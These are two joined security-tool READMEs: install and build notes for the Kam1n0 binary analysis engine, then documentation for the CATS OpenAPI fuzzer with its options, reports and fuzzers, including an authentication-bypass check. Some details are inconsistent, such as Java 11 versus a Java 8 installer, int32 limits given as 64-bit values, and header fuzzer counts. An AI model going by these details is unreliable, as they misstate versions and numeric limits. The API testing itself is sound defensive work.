The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as webupd8team not found) and you are on a proxy, make sure you set and export your http_proxy and https_proxy environment variables, and then try again with the -E option on sudo. Additionally, if you are getting an 'add-apt-repository: command not found' error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar -xvzf Kam1n0-IDA-Plugin.tar.gz and tar -xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server. kam1n0.ida.home refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any errors. All the resource paths are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. A Chrome browser must also be installed on the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compile the Java code, using pre-compiled wheels of libvex and z3, so the build works out of the box. The build of libvex and z3 itself is platform-dependent. We use a fork of libvex from Angr. More thorough build scripts, as well as installers for Windows/Linux, can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkins server for continuous development and delivery. The latest stable release will be posted here. Periodically, we will synchronize our internal experimental branch with this repository.

Licensing

The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number of scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer has specific expectations depending on the scenario under test
  • Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: the process to write, run and report tests is automatic, and covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data, from fully random large Unicode values to well-crafted, context-dependent values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for making CATS run fast and comprehensively at the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR and as a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it to your PATH so that you can execute it as any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line to ~/.zshrc or ~/.bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on your local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork of OkHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it with java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the unit tests. Those are expected behaviours when testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects and what the service returns (for example the Fuzzer expects a 400 and the service returns a 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any entities/resources required by request fields or query params be created in advance and added to the reference data file.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS supports a lot more arguments that allow you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report is placed in a folder called cats-report/TIMESTAMP or cats-report, depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to keep a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see a summary with all the tests, the corresponding path against which they were run, and the result
  • have the ability to click on any test and get details about the Scenario being executed, the Expected Result, the Actual Result, as well as request/response details

Along with the summary from index.html, each individual test will have a specific TestXXX.html page with more details, as well as a JSON version of the test which can later be replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test: 



HTML_ONLY

This format is similar to HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that incorporates all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of a warning, the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers: currently 89 and growing. Some of the Fuzzers execute multiple tests for every given field within the request. For example, the ControlCharsOnlyInFieldsFuzzer has 63 control-char values that will be tried for each request field. If a request has 15 fields, this results in 945 tests. Considering that there are additional Fuzzers with the same magnitude of generated tests, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific categories of Fuzzers, like: --checkHttp, --checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or --skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitespaces. This will skip all Fuzzers containing these strings in their name. Afterwards, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that because ControlChars, Emojis and Whitespaces generate a huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and reported as success instead of WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResponseCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code based on the scenario under test, and will report a WARN if the service returns the expected response code but that code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking the expected response code against the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS will now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report a WARN if it does not match. You can make CATS ignore the response body checks using the --ignoreResponseBodyCheck argument. CATS will now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, it will export for each test both an HTML file (linked in the final report) and an individual JSON file. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it to a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be searched for as a path, i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped by category

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS will check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FUZZERS a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skipFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contain the strings you provide in the argument's value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contract. If false, CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds within which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (no value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (no value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --output The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for any ignored codes provided via the --ignoreResponseXXX arguments
> cats --contract=my.yml --server=http://localhost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as the API spec and will only run the Header Fuzzers.
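These options compose freely. As a hedged illustration (the file names and server URL are placeholders), a blackbox-style run that also loads reference data and custom headers could look like:

> cats --contract=my.yml --server=http://localhost:8080 --refData=refData.yml --headers=headers.yml --blackbox

Here --blackbox keeps the report focused on 5XX responses, while refData.yml and headers.yml supply the business values and authentication headers described later in this document.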

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which check the contract for API good practices
  • Special Fuzzers, a special category which needs further configuration and is focused on more complex activities like functional flows, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS currently has 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String field that has maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer field that has maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String field that has minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer field that has minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through the request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with values trailed by Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with values trailed by Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.
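For example (contract name and field names are illustrative), a run limited to Field Fuzzers that also skips a couple of fields from replacement could look like:

> cats --contract=my.yml --server=http://localhost:8080 --checkFields --skipFields=id,createdAt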

Header Fuzzers

CATS currently has 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS currently has 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP methods specific to the WebDAV protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to be easily digestible by service clients and to act, as much as possible, as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for path names, separate words in paths with hyphens/underscores, and use camelCase or snake_case for json types and properties
  • provide tags for all operations in order to avoid breaking code generation in some languages and to keep a logical grouping of the API operations
  • provide good descriptions for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
